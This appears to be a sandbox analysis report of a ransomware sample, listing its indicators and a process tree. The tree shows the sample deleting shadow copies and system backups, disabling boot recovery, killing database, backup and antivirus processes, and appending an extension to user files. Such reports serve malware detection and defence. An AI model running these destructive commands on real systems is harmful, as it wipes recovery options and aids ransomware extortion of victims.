f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe 3544 f188cf267d209a0209a25bda4bb75b86.exe -
Kills process with taskkill 87 IoCs
pid Process 2128 taskkill.exe 1160 taskkill.exe 3708 taskkill.exe 1680 taskkill.exe 2968 taskkill.exe 1484 taskkill.exe 1760 taskkill.exe 3704 taskkill.exe 4060 taskkill.exe 396 taskkill.exe 2068 taskkill.exe 3096 taskkill.exe 2256 taskkill.exe 3812 taskkill.exe 1876 taskkill.exe 2848 taskkill.exe 2260 taskkill.exe 3720 taskkill.exe 1780 taskkill.exe 2980 taskkill.exe 2708 taskkill.exe 3208 taskkill.exe 1320 taskkill.exe 4036 taskkill.exe 980 taskkill.exe 492 taskkill.exe 3824 taskkill.exe 3968 taskkill.exe 520 taskkill.exe 1864 taskkill.exe 2992 taskkill.exe 1644 taskkill.exe 3716 taskkill.exe 3728 taskkill.exe 3644 taskkill.exe 1512 taskkill.exe 1212 taskkill.exe 1008 taskkill.exe 4016 taskkill.exe 1196 taskkill.exe 1708 taskkill.exe 2156 taskkill.exe 3984 taskkill.exe 2600 taskkill.exe 1064 taskkill.exe 2780 taskkill.exe 2664 taskkill.exe 2996 taskkill.exe 912 taskkill.exe 1400 taskkill.exe 2460 taskkill.exe 2408 taskkill.exe 912 taskkill.exe 344 taskkill.exe 3900 taskkill.exe 1868 taskkill.exe 1476 taskkill.exe 2788 taskkill.exe 2084 taskkill.exe 2728 taskkill.exe 2268 taskkill.exe 1928 taskkill.exe 3936 taskkill.exe 3720 taskkill.exe 1484 taskkill.exe 1212 taskkill.exe 3528 taskkill.exe 1928 taskkill.exe 3708 taskkill.exe 2992 taskkill.exe 3092 taskkill.exe 3716 taskkill.exe 3852 taskkill.exe 1148 taskkill.exe 3756 taskkill.exe 2596 taskkill.exe 3728 taskkill.exe 3952 taskkill.exe 1156 taskkill.exe 2268 taskkill.exe 1608 taskkill.exe 2600 taskkill.exe 3788 taskkill.exe 904 taskkill.exe 412 taskkill.exe 1148 taskkill.exe 404 taskkill.exe -
NTFS ADS 5 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\boot.sys:dxvsbnvje f188cf267d209a0209a25bda4bb75b86.exe File created C:\Users\Admin\AppData\Local\Temp\boot.sys:oudzwxfzjgvlopxy f188cf267d209a0209a25bda4bb75b86.exe File created C:\Users\Admin\AppData\Local\Temp\boot.sys:dxvsbnvje f188cf267d209a0209a25bda4bb75b86.exe File created C:\Users\Admin\AppData\Local\Temp\boot.sys:orkjoornvgffpsdex f188cf267d209a0209a25bda4bb75b86.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\boot.sys:zlnrfdizjwacp f188cf267d209a0209a25bda4bb75b86.exe -
Enumerates connected drives 3 TTPs
-
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\UnprotectSet.raw => C:\Users\Admin\Pictures\UnprotectSet.raw.ePCFSr f188cf267d209a0209a25bda4bb75b86.exe File opened for modification C:\Users\Admin\Pictures\UnprotectSet.raw.ePCFSr f188cf267d209a0209a25bda4bb75b86.exe File renamed C:\Users\Admin\Pictures\ExportStep.tif => C:\Users\Admin\Pictures\ExportStep.tif.ePCFSr f188cf267d209a0209a25bda4bb75b86.exe File opened for modification C:\Users\Admin\Pictures\ExportStep.tif.ePCFSr f188cf267d209a0209a25bda4bb75b86.exe File opened for modification C:\Users\Admin\Pictures\UnlockDeny.tiff f188cf267d209a0209a25bda4bb75b86.exe File renamed C:\Users\Admin\Pictures\UnlockDeny.tiff => C:\Users\Admin\Pictures\UnlockDeny.tiff.ePCFSr f188cf267d209a0209a25bda4bb75b86.exe File opened for modification C:\Users\Admin\Pictures\UnlockDeny.tiff.ePCFSr f188cf267d209a0209a25bda4bb75b86.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f188cf267d209a0209a25bda4bb75b86.exe"C:\Users\Admin\AppData\Local\Temp\f188cf267d209a0209a25bda4bb75b86.exe"1⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- NTFS ADS
- Modifies extensions of user files
PID:3544 -
C:\Windows\SysWOW64\cmd.execmd /C wmic.exe SHADOWCOPY DELETE /nointeractive2⤵
- Suspicious use of WriteProcessMemory
PID:3864 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic.exe SHADOWCOPY DELETE /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3852
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C wbadmin DELETE SYSTEMSTATEBACKUP2⤵PID:3184
-
-
C:\Windows\SysWOW64\cmd.execmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest2⤵PID:2956
-
-
C:\Windows\SysWOW64\cmd.execmd /C bcdedit.exe /set {default} recoveryenabled No2⤵PID:3984
-
-
C:\Windows\SysWOW64\cmd.execmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵PID:4036
-
-
C:\Windows\SysWOW64\cmd.execmd /C vssadmin.exe Delete Shadows /All /Quiet2⤵
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:2728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C C:\Windows\system32\vssvc.exe2⤵PID:3632
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM wxServer*2⤵
- Suspicious use of WriteProcessMemory
PID:3732 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM wxServer*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:2996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM wxServerView*2⤵
- Suspicious use of WriteProcessMemory
PID:3800 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM wxServerView*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sqlmangr*2⤵
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sqlmangr*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM RAgui*2⤵
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM RAgui*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM supervise*2⤵
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM supervise*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:2084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Culture*2⤵
- Suspicious use of WriteProcessMemory
PID:492 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Culture*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3716
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Defwatch*2⤵PID:392
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Defwatch*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1160
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM winword*2⤵PID:496
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM winword*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:3720
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBW32*2⤵PID:1212
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBW32*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3852
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBDBMgr*2⤵PID:1320
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBDBMgr*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:2992
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM qbupdate*2⤵PID:2968
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM qbupdate*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1484
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM axlbridge*2⤵PID:3092
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM axlbridge*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM httpd*2⤵PID:980
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM httpd*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:2600
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM fdlauncher*2⤵PID:1680
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM fdlauncher*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:3728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MsDtSrvr*2⤵PID:1760
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MsDtSrvr*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:3812
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM java*2⤵PID:396
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM java*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1876
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM 360se*2⤵PID:1156
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM 360se*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:3208
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM 360doctor*2⤵PID:3816
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM 360doctor*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM wdswfsafe*2⤵PID:3528
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM wdswfsafe*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM fdhost*2⤵PID:2068
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM fdhost*3⤵PID:1484
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM GDscan*2⤵PID:412
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM GDscan*3⤵
- Kills process with taskkill
PID:2728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM ZhuDongFangYu*2⤵PID:408
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM ZhuDongFangYu*3⤵
- Kills process with taskkill
PID:2460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBDBMgrN*2⤵PID:2056
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBDBMgrN*3⤵
- Kills process with taskkill
PID:2268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM mysqld*2⤵PID:1676
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM mysqld*3⤵PID:1148
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM AutodeskDesktopApp*2⤵PID:1740
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM AutodeskDesktopApp*3⤵
- Kills process with taskkill
PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM acwebbrowser*2⤵PID:1876
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM acwebbrowser*3⤵
- Kills process with taskkill
PID:3708
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Creative Cloud*2⤵PID:3208
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Creative Cloud*3⤵
- Kills process with taskkill
PID:3900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Adobe Desktop Service*2⤵PID:1392
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Adobe Desktop Service*3⤵PID:1212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM CoreSync*2⤵PID:1888
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM CoreSync*3⤵
- Kills process with taskkill
PID:1400
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Adobe CEF Helper*2⤵PID:3596
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Adobe CEF Helper*3⤵
- Kills process with taskkill
PID:2848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM node*2⤵PID:584
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM node*3⤵
- Kills process with taskkill
PID:4036
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM AdobeIPCBroker*2⤵PID:1916
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM AdobeIPCBroker*3⤵
- Kills process with taskkill
PID:2408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sync-taskbar*2⤵PID:2824
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sync-taskbar*3⤵
- Kills process with taskkill
PID:2260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sync-worker*2⤵PID:3240
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sync-worker*3⤵
- Kills process with taskkill
PID:980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM InputPersonalization*2⤵PID:1164
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM InputPersonalization*3⤵
- Kills process with taskkill
PID:1680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM AdobeCollabSync*2⤵PID:1912
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM AdobeCollabSync*3⤵
- Kills process with taskkill
PID:1760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM BrCtrlCntr*2⤵PID:4068
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM BrCtrlCntr*3⤵
- Kills process with taskkill
PID:1868
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM BrCcUxSys*2⤵PID:2956
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM BrCcUxSys*3⤵
- Kills process with taskkill
PID:3720
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SimplyConnectionManager*2⤵PID:3816
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SimplyConnectionManager*3⤵
- Kills process with taskkill
PID:1212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Simply.SystemTrayIcon*2⤵PID:1400
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Simply.SystemTrayIcon*3⤵
- Kills process with taskkill
PID:2780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM fbguard*2⤵PID:3596
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM fbguard*3⤵
- Kills process with taskkill
PID:912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM fbserver*2⤵PID:1468
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM fbserver*3⤵
- Kills process with taskkill
PID:1008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM ONENOTEM*2⤵PID:2116
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM ONENOTEM*3⤵
- Kills process with taskkill
PID:1644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM wrapper*2⤵PID:2600
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM wrapper*3⤵PID:3756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM DefWatch*2⤵PID:3716
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM DefWatch*3⤵
- Kills process with taskkill
PID:1780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM ccEvtMgr*2⤵PID:4016
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM ccEvtMgr*3⤵
- Kills process with taskkill
PID:396
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM ccSetMgr*2⤵PID:3824
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM ccSetMgr*3⤵PID:1156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SavRoam*2⤵PID:3788
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SavRoam*3⤵
- Kills process with taskkill
PID:2664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Sqlservr*2⤵PID:1512
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Sqlservr*3⤵PID:3528
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sqlagent*2⤵PID:4060
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sqlagent*3⤵
- Kills process with taskkill
PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sqladhlp*2⤵PID:904
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sqladhlp*3⤵
- Kills process with taskkill
PID:2068
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Culserver*2⤵PID:2848
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Culserver*3⤵
- Kills process with taskkill
PID:3644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM RTVscan*2⤵PID:404
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM RTVscan*3⤵
- Kills process with taskkill
PID:2980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sqlbrowser*2⤵PID:492
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sqlbrowser*3⤵
- Kills process with taskkill
PID:3704
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLADHLP*2⤵PID:2060
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLADHLP*3⤵PID:2268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBIDPService*2⤵PID:3612
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBIDPService*3⤵PID:1148
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Intuit.QuickBooks.FCS*2⤵PID:1764
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Intuit.QuickBooks.FCS*3⤵PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBCFMonitorService*2⤵PID:392
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBCFMonitorService*3⤵PID:3708
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sqlwriter*2⤵PID:2660
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sqlwriter*3⤵
- Kills process with taskkill
PID:1708
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM msmdsrv*2⤵PID:3436
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM msmdsrv*3⤵PID:1608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM tomcat6*2⤵PID:2812
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM tomcat6*3⤵
- Kills process with taskkill
PID:344
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM zhudongfangyu*2⤵PID:3012
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM zhudongfangyu*3⤵
- Kills process with taskkill
PID:2788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM vmware-usbarbitator64*2⤵PID:2164
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM vmware-usbarbitator64*3⤵
- Kills process with taskkill
PID:2156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM vmware-converter*2⤵PID:2828
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM vmware-converter*3⤵
- Kills process with taskkill
PID:3096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM dbsrv12*2⤵PID:3016
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM dbsrv12*3⤵
- Kills process with taskkill
PID:2256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM dbeng8*2⤵PID:1056
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM dbeng8*3⤵PID:2600
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*2⤵PID:2432
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$MICROSOFT##WID*3⤵
- Kills process with taskkill
PID:3716
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*2⤵PID:1028
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$VEEAMSQL2012*3⤵
- Kills process with taskkill
PID:4016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*2⤵PID:3640
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLAgent$VEEAMSQL2012*3⤵
- Kills process with taskkill
PID:3824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLBrowser*2⤵PID:3804
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLBrowser*3⤵
- Kills process with taskkill
PID:3968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLWriter*2⤵PID:1392
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLWriter*3⤵PID:2992
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM FishbowlMySQL*2⤵PID:2700
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM FishbowlMySQL*3⤵
- Kills process with taskkill
PID:2968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*2⤵PID:1496
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$MICROSOFT##WID*3⤵PID:2596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MySQL57*2⤵PID:2184
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MySQL57*3⤵
- Kills process with taskkill
PID:2708
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*2⤵PID:3632
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*3⤵
- Kills process with taskkill
PID:3984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQLServerADHelper100*2⤵PID:2824
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQLServerADHelper100*3⤵PID:3092
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*2⤵PID:3240
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*3⤵PID:3728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM msftesql-Exchange*2⤵PID:1164
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM msftesql-Exchange*3⤵
- Kills process with taskkill
PID:520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*2⤵PID:1912
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$MICROSOFT##SSEE*3⤵
- Kills process with taskkill
PID:1196
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$SBSMONITORING*2⤵PID:3900
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$SBSMONITORING*3⤵
- Kills process with taskkill
PID:3936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$SHAREPOINT*2⤵PID:1320
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$SHAREPOINT*3⤵PID:3788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*2⤵PID:2096
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*3⤵
- Kills process with taskkill
PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*2⤵PID:740
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*3⤵
- Kills process with taskkill
PID:4060
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLAgent$SBSMONITORING*2⤵PID:1484
-
